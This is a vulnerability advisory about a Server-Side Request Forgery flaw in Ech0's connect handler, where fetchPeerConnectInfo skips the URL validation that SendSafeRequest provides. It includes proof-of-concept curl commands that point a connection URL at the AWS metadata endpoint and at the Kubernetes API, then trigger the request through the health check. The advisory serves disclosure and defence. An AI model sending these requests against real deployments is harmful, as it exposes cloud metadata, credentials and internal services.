Description

Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo

Summary

The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest (which has ValidatePublicHTTPURL with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints.

Details

In internal/service/connect/connect.go, the fetchPeerConnectInfo function:

func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
    url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
    resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)

This uses SendRequest which has NO URL validation. The codebase HAS SendSafeRequest at internal/util/http/http.go:228-281 with proper SSRF protection, but fetchPeerConnectInfo does not use it.

Called from:

Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)

Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)

PoC

# 1. Add a connection pointing to AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}'

# 2. Trigger SSRF via health check
curl -H "Authorization: Bearer <token>" \
  "https://ech0.example.com/api/connects/health"...
Show more

Or for Kubernetes:

curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}'

Impact

Confidentiality: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API

CWE-918: Server-Side Request Forgery

Mitigation

Aliases

References